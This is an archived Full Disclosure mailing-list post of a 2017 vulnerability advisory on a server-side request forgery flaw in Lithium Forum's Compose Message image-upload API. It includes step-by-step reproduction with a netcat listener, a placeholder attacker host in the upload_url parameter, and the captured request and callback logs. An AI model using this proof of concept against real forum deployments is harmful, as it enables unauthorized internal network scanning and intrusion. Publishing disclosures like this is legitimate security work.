[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Lithium Forum - (Compose Message) SSRF Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2017-02-20 10:04:09
Message-ID: 39468772-cd58-6c5d-e7fa-31adcd09ae96 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Lithium Forum - (Compose Message) SSRF Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2030
Release Date:
=============
2017-02-20
Vulnerability Laboratory ID (VL-ID):
====================================
2030
Common Vulnerability Scoring System:
====================================
5.7
Product & Service Introduction:
===============================
Lithium Technologies provides social customer experience management software for the \
enterprise. Headquartered in San Francisco, Lithium has additional offices in London, Austin, \
Paris, Sydney, Singapore, New York, and Zürich. Lithium was founded in 2001 as a spin-out \
from GX Media, which created technologies for professional rankings and tournaments and now \
hosts a number of popular gaming sites. The company`s founders include brothers Lyle Fong and \
Dennis Fong, who together also founded GX Media, as well as Kirk Yokomizo, John Joh, Nader \
Alizadeh, Michel Thouati, Michael Yang, and Matt Ayres. The company sells largely to enterprise \
customers, including HP, Best Buy, Research In Motion, Sony, Comcast, Symantec, and AT&T.
(Copy of the Vendor Homepage: https://en.wikipedia.org/wiki/Lithium_Technologies )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a server side request forgery \
vulnerability in the official Lithium Forum online service web-application.
Vulnerability Disclosure Timeline:
==================================
2017-02-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Lithium Technologies
Product: Lithium Forum - Web Application (API) 2017 Q1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A server side request forgery vulnerability has been discovered in the official Lithium Forum \
online service web-application. The vulnerability allows remote attacker to scan the internal \
and external network, depending on the resultation time of the attack.
The vulnerability is located in the official Community Compose Message function. The attack \
vector of the vulnerability is located on the application-side of the service and the request \
method to run is POST. The execution point is also the Compose Message functions. Due to the \
testings and research we figured out that several high class vendors using the commercial \
lithium web-application like ebay, vodafone, att, paypal, microsoft, skype and sony.
The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability \
scoring system) count of 5.7 Exploitation of the ssrf web vulnerability requires a low \
privilege web application user account without user interaction. Successful exploitation of \
the vulnerability results in local/external portscan and possible mail spoofing over header \
redirection.
Affected Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Lithium Forum - Community - Compose Message
Vulnerable Parameter(s):
[+] upload_url
Proof of Concept (PoC):
=======================
The server side request forgery web vulnerability can be exploited by remote attackers with low \
privileged web-application user account and low user interaction. For security demonstration or \
to reproduce the security vulnerability follow the provided information and steps below to \
continue.
Manual steps to reproduce the vulnerability ...
1. Register an lithium forum account and login to the web-application
2. Open link "t5/notes/privatenotespage/tab/compose"
3. click add images
4. Open netcat on your attackers machine, and listen on port 1337
5. Insert the following URL as Image: "http://your-host.com:1337/mypicture.jpg"
6. After the submit, you will see a connection inside of your netcat application.
7. Successful reproduce of the vulnerability!
netcat logs:
root@xxxxxxx:~# nc -l -v -p 1337
listening on [any] 1337 ...
Warning: forward host lookup failed for outbound.sj.lithium.com: Unknown host
connect to [*********] from outbound.sj.lithium.com [***.**.***.253] 60592
GET /mypicture.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like \
Gecko) Chrome/53.0.2785.116 Safari/537.36
Accept: image/webp,image/*,*/*
Host: your-host.com:1337
--- PoC Session Logs [POST] ---
POST /api/2.0/images HTTP/1.1
Host: *****
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: application/json, text/plain, */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Application-Identifier: DESKTOP
Application-Version: 2.0.0
Referer: https://*****/t5/notes/composepage/note-to-user-id/584604
Content-Length: 158
Cookie: *censored* LithiumUserInfo=9403260; \
LithiumUserSecure=9e27764c-7d10-48e2-80c4-70fc955d7432
Connection: keep-alive
{"data":{"upload_url":"http://my-host.top:1337/blablablda.jpg","title":"blablablda","description":"","visibility":"draft","album":{"id":"35418"},"type":"image"}}
HTTP/1.1 500 Internal Server Error
Date: Wed, 01 Feb 2017 09:24:14 GMT
Server: Apache
x-frame-options: SAMEORIGIN
Content-Length: 152
Connection: close
Content-Type: application/json;charset=UTF-8
Reference(s):
http://community.[WEBSITE].com/
http://community.[WEBSITE].com/t5/
http://community.[WEBSITE].com/api/2.0/images
http://community.[WEBSITE].com/t5/notes/privatenotespage/tab/compose
Solution - Fix & Patch:
=======================
Disallow the usage of other protocols like http on server-side requests and change the \
validation type of the inputs.
Security Risk:
==============
The security risk of the server side request forgery web vulnerability is estimated as medium. \
(CVSS 5.7)
Credits & Authors:
==================
Vibhuti R V Nath - [vibhuti123_i@yahoo.co.in] \
(http://www.vulnerability-lab.com/show.php?user=VibhutiNath)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability mainly for consequential or incidental damages so the \
foregoing limitation may not apply. We do not approve or encourage anybody to break any \
licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or \
information requires authorization from Vulnerability Laboratory. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, including the use \
of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All \
pictures, texts, advisories, source code, videos and other information on this website is \
trademark of vulnerability-lab team & the specific authors or managers. To record, list, \
modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic